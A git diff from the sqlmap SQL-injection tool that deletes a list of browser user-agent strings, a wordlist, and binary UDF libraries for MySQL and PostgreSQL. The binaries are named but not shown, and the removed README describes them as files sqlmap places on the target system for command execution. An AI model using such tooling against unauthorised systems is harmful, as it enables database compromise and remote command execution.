-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.7 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.8.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Ddg/18.6
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.6 Safari/605.1.15 Ddg/18.6
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:140.0) Gecko/20100101 Firefox/140.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:141.0) Gecko/20100101 Firefox/141.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:142.0) Gecko/20100101 Firefox/142.0
-Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
-Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15
-Mozilla/5.0 (Macintosh; Intel Mac OS X 15_4 ADSSO) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.4 Safari/605.1.15
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Edg/121.0.0.0 Unique/97.7.7239.70
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Edg/131.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Edg/135.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-1)
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 OPR/120.0.0.0 (Edition std-2)
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 YaBrowser/25.6.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Edg/137.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.104 ADG/11.1.4905 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.92 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.93 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.96 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.7204.97 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Avast/139.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 AVG/139.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Edg/139.0.0.0 Herring/90.1.1459.6
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 Norton/139.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36 OpenWave/96.4.8983.84
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.7258.5 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.16 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4482.0 Safari/537.36 Edg/92.0.874.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:139.0) Gecko/20100101 Firefox/139.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:142.0) Gecko/20100101 Firefox/142.0
-Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0
-Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
-Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
-Mozilla/5.0 (X11; CrOS x86_64 13904.97.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.167 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; CrOS x86_64 14816.131.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 Chrome/116.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/28.0 Chrome/130.0.0.0 Safari/537.36
-Mozilla/5.0 (X11; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
-Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
-Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
-Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
-Mozilla/5.0 (X11; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0
-Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
-Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0
-Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0
diff --git a/data/txt/wordlist.tx_ b/data/txt/wordlist.tx_
deleted file mode 100644
index f2b52c90658..00000000000
Binary files a/data/txt/wordlist.tx_ and /dev/null differ
diff --git a/data/udf/README.txt b/data/udf/README.txt
deleted file mode 100644
index 5cecd99f5ee..00000000000
--- a/data/udf/README.txt
+++ /dev/null
@@ -1,4 +0,0 @@
-Binary files in this folder are data files used by sqlmap on the target
-system, but not executed on the system running sqlmap. They are licensed
-under the terms of the GNU Lesser General Public License and their source
-code is available on https://github.com/sqlmapproject/udfhack.
diff --git a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/32/lib_mysqludf_sys.so_
deleted file mode 100644
index bfd4440ba5f..00000000000
Binary files a/data/udf/mysql/linux/32/lib_mysqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ b/data/udf/mysql/linux/64/lib_mysqludf_sys.so_
deleted file mode 100644
index 1992ed0347e..00000000000
Binary files a/data/udf/mysql/linux/64/lib_mysqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
deleted file mode 100644
index bb8ec366d4c..00000000000
Binary files a/data/udf/mysql/windows/32/lib_mysqludf_sys.dll_ and /dev/null differ
diff --git a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ b/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
deleted file mode 100644
index 97799b69d4d..00000000000
Binary files a/data/udf/mysql/windows/64/lib_mysqludf_sys.dll_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
deleted file mode 100644
index 33dbdeeb35b..00000000000
Binary files a/data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
deleted file mode 100644
index c56d766209a..00000000000
Binary files a/data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
deleted file mode 100644
index 3fb236e2644..00000000000
Binary files a/data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
deleted file mode 100644
index d734fff00ae..00000000000
Binary files a/data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
deleted file mode 100644
index da50fa8eafc..00000000000
Binary files a/data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
deleted file mode 100644
index 83732d33298..00000000000
Binary files a/data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
deleted file mode 100644
index ee1ca8ccef1..00000000000
Binary files a/data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
deleted file mode 100644
index ab7e7456223..00000000000
Binary files a/data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
deleted file mode 100644
index 5314a0a3886..00000000000
Binary files a/data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
deleted file mode 100644
index da9d0a7f6f7..00000000000
Binary files a/data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
deleted file mode 100644
index 1100ab820fd..00000000000
Binary files a/data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
deleted file mode 100644
index f9396a86aa5..00000000000
Binary files a/data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
deleted file mode 100644
index 21bbddcf59e..00000000000
Binary files a/data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
deleted file mode 100644
index 9327b1cdba3..00000000000
Binary files a/data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
deleted file mode 100644
index a9874449464..00000000000
Binary files a/data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
deleted file mode 100644
index e4b124fc8b3..00000000000
Binary files a/data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
deleted file mode 100644
index 2c22afae9a2..00000000000
Binary files a/data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
deleted file mode 100644
index ab23ee6a749..00000000000
Binary files a/data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
deleted file mode 100644
index 8dae29c8336..00000000000
Binary files a/data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
deleted file mode 100644
index e5d05fc6f16..00000000000
Binary files a/data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
deleted file mode 100644
index ff31df61499..00000000000
Binary files a/data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
deleted file mode 100644
index d5576fdd8cf..00000000000
Binary files a/data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
deleted file mode 100644
index 2350427f4ac..00000000000
Binary files a/data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
deleted file mode 100644
index eae84bdadd0..00000000000
Binary files a/data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ b/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
deleted file mode 100644
index 4a408a1ae0c..00000000000
Binary files a/data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_ and /dev/null differ
diff --git a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
deleted file mode 100644
index 40f838b30f5..00000000000
Binary files a/data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ and /dev/null differ
diff --git a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
deleted file mode 100644
index a9b4b48c7b7..00000000000
Binary files a/data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ and /dev/null differ
diff --git a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
deleted file mode 100644
index 06aee54d778..00000000000
Binary files a/data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ and /dev/null differ
diff --git a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ b/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
deleted file mode 100644
index 67b5d34976f..00000000000
Binary files a/data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ and /dev/null differ
diff --git a/data/xml/banner/generic.xml b/data/xml/banner/generic.xml
deleted file mode 100644
